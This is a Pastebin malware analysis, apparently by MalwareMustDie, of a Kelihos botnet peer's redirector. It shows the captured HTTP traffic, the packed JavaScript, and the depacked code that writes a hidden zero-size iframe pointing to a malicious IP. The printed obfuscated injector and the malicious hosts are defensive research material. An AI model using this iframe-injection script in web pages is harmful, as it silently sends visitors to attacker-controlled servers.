SHARE
TWEET

Kelihos peer redirecting JS scheme

MalwareMustDie Dec 21st, 2015 (edited) 84 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. ################################################
  2. #
  3. # Accessing specific htm redirector in kelihos peer
  4. # This demonstrated only one Kelihos peer redir traffic
  5. # MalwareMustDie!
  6. #
  7. ################################################
  8.  
  9. ---connection---
  10. 2015-10-17 00:35:56 http://151.0.21.237/index5.html
  11. Connecting to 151.0.21.237:80... connected.
  12.  
  13. ---request begin---
  14. GET /index5.html HTTP/1.1
  15. User-Agent: booboo
  16. Accept: */*
  17. Accept-Encoding: identity
  18. Host: 151.0.21.237
  19. Connection: Keep-Alive
  20. HTTP request sent, awaiting response...
  21. ---response begin---
  22. HTTP/1.1 200
  23. Server: Apache
  24. Content-Length: 587
  25. Content-Type:
  26. Last-Modified: ?? 16 Ⅷ?2015 15:35:55 GMT
  27. Accept-Ranges: bytes
  28. Server:nginx/1.2.6
  29. Date:Fri, 16 Oct 2015 15:35:57 GMT
  30. Last-Modified:Fri, 16 Oct 2015 15:35:20 GMT
  31. ETag:"56211938-24b"
  32. Accept-Ranges:bytes
  33. ---response end---
  34.  
  35. Saving to: '/test'
  36. /test    100%[===============>]     587  1.30KB/s   in 0.4s
  37.  
  38. Last-modified header invalid -- time-stamp ignored.
  39. 2015-10-17 00:35:58 (1.30 KB/s) - '/test' saved [587/587]
  40.  
  41.  
  42. ################################################
  43. #
  44. # An online packer packed Javascript...
  45. #
  46. ################################################
  47.  
  48. // curl
  49.  
  50. $ curl http://151.0.21.237/index5.html
  51. <script>eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|176||src|height|117|width|board||21|php|76|tag1|ram'.split('|'),0,{}))</script>
  52.  
  53. // beautified
  54.  
  55.  
  56.  eval(function(p,a,c,k,e,d)
  57.  {
  58.    e=function(c)
  59.    {
  60.      return c.toString(36)
  61.    };
  62.    if(!''.replace(/^/,String))
  63.    {
  64.      while(c--)
  65.      {
  66.        d[c.toString(a)]=k[c]||c.toString(a)
  67.      }
  68.      k=[function(e)
  69.      {
  70.        return d[e]
  71.      }
  72.      ];
  73.      e=function()
  74.      {
  75.        return'\\w+'
  76.      };
  77.      c=1
  78.    };
  79.    while(c--)
  80.    {
  81.      if(k[c])
  82.      {
  83.        p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])
  84.      }
  85.    }
  86.    return p
  87.  }
  88.  ('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|176||src|height|117|width|board||21|php|76|tag1|ram'.split('|'),0,
  89.  {
  90.  }
  91.  ))
  92.  
  93.  
  94. ################################################
  95. #
  96. # depacked the script....
  97. #
  98. ################################################
  99.  
  100.  var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://176.117.76.21/tag1.php\">";
  101.  var k0="<if";
  102.  var k01="ram";
  103.  var k02="e";
  104.  var k2="</if";
  105.  var k22="e>";
  106.  document.write(k0);
  107.  setTimeout(document.write(k01+k02+k+k2),1000);
  108.  setTimeout(document.write(k02+k22),1000);
  109.  
  110. ################################################
  111. #
  112. # redirector result....
  113. #
  114. ################################################
  115.  
  116. <iframe width="0" height="0" board="0" src="http://176.117.76.21/tag1.php"></iframe>
  117.  
  118.  
  119. ################################################
  120. #
  121. # Where does it go?
  122. #
  123. ################################################
  124.  
  125. HTTP/1.1 200
  126. Server: Apache
  127. Content-Length: 54
  128. Content-Type:
  129. Last-Modified: ?? 16 Ⅷ?2015 15:54:40 GMT
  130. Accept-Ranges: bytes
  131. Server:nginx/1.2.6
  132. Date:Fri, 16 Oct 2015 15:54:44 GMT
  133. X-Powered-By:PHP/5.4.11
  134. ---response end---
  135.  
  136. Saving to: 'tag1.php'
  137. tag1.php      100%[===============>]      54   122 B/s   in 0.4s
  138. 2015-10-17 00:54:45 (122 B/s) - 'tag1.php' saved [54/54]
  139.  
  140. $ date
  141. Sat Oct 17 00:56:53 JST 2015
  142. $ cat tag1.php
  143. <!DOCTYPE HTML><html><head></head><body>xxxxxxxxxxxxxxx</body></html>
  144.  
  145. #MalwareMustDie! Analyzed by @unixfreaxjp
  146.  
  147. [EOF]
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top